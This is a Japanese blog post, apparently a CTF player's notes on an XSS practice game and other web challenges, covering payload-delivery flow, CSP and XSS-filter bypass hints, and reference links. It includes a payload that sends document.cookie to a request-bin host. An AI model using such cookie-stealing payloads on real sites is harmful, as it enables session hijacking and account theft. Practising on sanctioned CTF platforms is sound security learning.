from electron 2 web

インターネットのリソースを無駄遣いして検索におけるUXを下げてごめんなさい

圧倒的文章力のNASAでゴミみたいなチラ裏のようなメモを量産してしまい全ての"Web開発者"にごめんなさい

xss1000本ノックを解いた&その他解いたctf

xss1000本ノックについて

xssがinjectできるページがあり、クエリに不正な文字列を入れてxssを発火させるゲーム。
POCが作成出来たらサーバー側でheadless chrome的なものが動いているのでそこに投げてdocument.cookieを盗み出す(投げると自動でurlを踏んでくれるformがあってそこに入れる)
あとは適当にrequest.bin的なのを使用すればflagが見える。

  1. veln page(injectivle xss)がサーバーから送られてくる

  2. malformed queryをサーバーに投げる

  3. queryをもとにサーバーでhtmlを生成(reflectedの場合)

  4. responseとして帰ってきたページでxssが発火

注意点、ヒント

クエリに+等の文字列は使えない(http://hoge.knock.xss.moe/?q=location="request.bin/xxxxx?"+document.cookieといったものはブラウザが意図したとおりに認識しない)ため、パーセントエンコーディングする必要がある。 sqlインジェクション等でselect+sql+from+sql_tableといった文字列を見たことがあるかもしれないがこれと同じで空白として認識されるから(たぶん)

個人的良問

Stage7・・・xssだが<>といった文字列がサニタイジングされるため、属性のみで発火する必要がある。input textには即時発火させる属性は無いため複数の属性を組み合わせて即時発火のxssを作る必要がある。

stage 12・・・cspをbypassさせる。

stage 13・・・mage問。x-xss-protection(xssフィルタ)をbypassさせる。クソ大変だった。

stage 14・・・csp bypass問その2。sopを体系的に理解してれば解ける。

参考資料

解くときのヒント、参考になるもの。とはいってもwebにおいてggr力もかなり大切なのでそういった意味では自力でggrのも良いかも。

「観覧注意」・・・writeup。12までは普通にシュッと解けるし13以降も時間かければ解けるのであまり見るのをおすすめしない。
狗子的XSS學習之旅 - 掃文資訊

XSS フィルター回避チートシート - OWASP

Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa/filterbypass Wiki · GitHub

CSP に関するチートシート - OWASP

クロスドメイン制約 を document.domain の 変更 で 回避 - galife

色んなXSS – nootropic.me

XSSパターン

TECHNICAL MANUAL

以下は直接参考にはならないがxssの理解や高度なxss

ブラウザのXSSフィルタを利用した情報窃取攻撃 | MBSD Blog

396544 - Security: XSS filter information leak - chromium - Monorail

X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~

CSP Lv.2の話

http://masatokinugawa.l0.cm/2016/12/xss9.html

雑記

最近はctfをやりまくっている。

asis ctfに個人チームで出て自明問題を2問解いたがweb系でまたしても全滅してしまったので悔しかったため。

相変わらずharekazeではst98先生が無双していた。終了後にharekazeのasisctfチャンネル見たら本当に着眼点がすごくて自分じゃ絶対できないなっていう着眼点から解法にたどり着いていたのですげぇってなったしはやくこれになりたいってなった。

とりあえずweb問ということでsqlインジェクションphpのバグを突く系の問題が苦手だったのでwargame.krを解いた。どちらのジャンルも良問だった。

maguroのrailsとか解いた。rack特有のアでアしてアな問題だった。こういう言語特有系の問題もっと解きたい。

xss1000本ノックはstage14で止まってる(pocはできてるのであとはセッション盗むだけ、時間かければたぶん解けるけどいったん休憩)

今自分がやってる常設のweb問はだいたい解き散らかしてしまった。

今後はpicoctf2017のweb全完、wargame.krとかやっていきたい。とりあえず今までやってた常設で自明のSimple Auth II(ksnctf)はメインのサーバーにrdp使えるようになったらすぐ解く(ちょっと諸事情があり鯖が使えない)

あとksnで残ってるのはKanGachaとシャーロックホームズだけ、どちらも特殊なweb系だからなぁ。だるい。

ksnctf暗号もどき多くないですか?